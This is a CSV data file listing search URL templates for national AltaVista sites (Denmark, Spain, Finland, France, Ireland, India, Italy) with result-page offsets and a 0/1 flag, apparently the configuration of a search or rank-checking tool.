"International","Altavista DK 4 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista DK 4 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista DK 4 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista DK 4 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista DK 4 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista DK 4 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista DK 5 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista DK 5 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista DK 5 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista DK 5 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista DK 5 (Next 50)","http://dk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista DK 5 (Next 50)","http://dk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista ES","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista ES","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista ES","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista ES","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista ES","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista ES","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista ES 2 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista ES 2 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista ES 2 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista ES 2 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista ES 2 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista ES 2 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista ES 3 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista ES 3 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista ES 3 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista ES 3 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista ES 3 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista ES 3 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista ES 4 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista ES 4 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista ES 4 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista ES 4 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista ES 4 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista ES 4 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista ES 5 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista ES 5 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista ES 5 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista ES 5 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista ES 5 (Next 50)","http://es.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista ES 5 (Next 50)","http://es.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista FI","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista FI","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista FI","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista FI","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista FI","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista FI","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista FI 2 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista FI 2 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista FI 2 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista FI 2 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista FI 2 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista FI 2 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista FI 3 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista FI 3 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista FI 3 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista FI 3 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista FI 3 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista FI 3 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista FI 4 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista FI 4 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista FI 4 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista FI 4 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista FI 4 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista FI 4 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista FI 5 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista FI 5 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista FI 5 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista FI 5 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista FI 5 (Next 50)","http://fi.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista FI 5 (Next 50)","http://fi.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista FR","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","AltaVista FR","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista FR","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista FR","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista FR","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista FR","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista FR 2 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","AltaVista FR 2 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista FR 2 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista FR 2 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista FR 2 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista FR 2 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista FR 3 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","AltaVista FR 3 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista FR 3 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista FR 3 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista FR 3 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista FR 3 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista FR 4 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","AltaVista FR 4 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista FR 4 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista FR 4 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista FR 4 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista FR 4 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista FR 5 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","AltaVista FR 5 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista FR 5 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista FR 5 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista FR 5 (Next 50)","http://fr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista FR 5 (Next 50)","http://fr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista IE","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista IE","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista IE","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista IE","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista IE","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista IE","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista IE 2 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista IE 2 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista IE 2 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista IE 2 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista IE 2 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista IE 2 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista IE 3 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista IE 3 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista IE 3 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista IE 3 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista IE 3 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista IE 3 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista IE 4 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista IE 4 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista IE 4 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista IE 4 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista IE 4 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista IE 4 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista IE 5 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista IE 5 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","1"
"International","Altavista IE 5 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista IE 5 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista IE 5 (Next 50)","http://ie.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista IE 5 (Next 50)","http://ie.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista IN","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista IN","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista IN","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista IN","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista IN","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista IN","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista IN 2 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista IN 2 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista IN 2 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista IN 2 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista IN 2 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista IN 2 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista IN 3 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista IN 3 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista IN 3 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista IN 3 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista IN 3 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista IN 3 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista IN 4 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista IN 4 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista IN 4 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista IN 4 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista IN 4 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista IN 4 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista IN 5 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista IN 5 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista IN 5 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista IN 5 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista IN 5 (Next 50)","http://in.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista IN 5 (Next 50)","http://in.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista IT","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","AltaVista IT","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista IT","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista IT","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista IT","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista IT","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista IT 2 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","AltaVista IT 2 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista IT 2 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista IT 2 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista IT 2 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista IT 2 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista IT 3 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
